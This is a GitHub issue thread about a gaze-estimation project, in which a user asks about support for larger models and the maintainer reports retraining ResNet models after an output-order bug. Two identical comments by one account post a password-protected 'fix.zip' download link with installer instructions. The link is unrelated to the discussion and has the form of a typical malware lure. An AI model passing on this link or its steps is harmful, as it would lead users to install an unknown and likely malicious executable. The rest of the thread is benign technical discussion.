### ISSUE TITLE
Thank you and inquiry about support for more advanced models

### ISSUE THREAD

**Issue by guikunchen** [yakhyo/gaze-estimation#2]
First, I want to express my sincere gratitude for creating and maintaining this project. The work you've put into developing a robust gaze estimation system is truly impressive.

I'm fortunate to have access to substantial GPU resources, which led me to wonder: Are there any plans to support more advanced models for face detection and gaze estimation? For example, larger or more sophisticated architectures that might offer improved performance at the cost of higher computational requirements?

Once again, I really appreciate the time and effort you've invested in this project. It has been incredibly helpful in my work, and I'm excited to see how it continues to evolve.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yakhyo** [comment]
@guikunchen ,
Hi, I am going to release other models in near future. Just quick info, I found an error in the model output order and now re-training some of the models and will replace current models soon (it's in `fix` branch), even current `main` branch works as expected.

**Comment by guikunchen** [comment]
> @guikunchen , Hi, I am going to release other models in near future. Just quick info, I found an error in the model output order and now re-training some of the models and will replace current models soon (it's in `fix` branch), even current `main` branch works as expected.

@yakhyo Thanks for your time! In terms of the output order, do you mean this https://github.com/Ahmednull/L2CS-Net/issues/32 ? Looking forward to the fixed version:)

**Comment by yakhyo** [comment]
> > @guikunchen , Hi, I am going to release other models in near future. Just quick info, I found an error in the model output order and now re-training some of the models and will replace current models soon (it's in `fix` branch), even current `main` branch works as expected.
> 
> @yakhyo Thanks for your time! In terms of the output order, do you mean this [Ahmednull/L2CS-Net#32](https://github.com/Ahmednull/L2CS-Net/issues/32) ? Looking forward to the fixed version:)

Thank you for your interest also. Yes, exactly. Soon I will update and let you know in this issue.

**Comment by yakhyo** [comment]
@guikunchen , I uploaded the re-trained models for ResNet 18/34/50 models.

**Comment by guikunchen** [comment]
> @guikunchen , I uploaded the re-trained models for ResNet 18/34/50 models.

Thanks! Looking forward to the release of other models :)
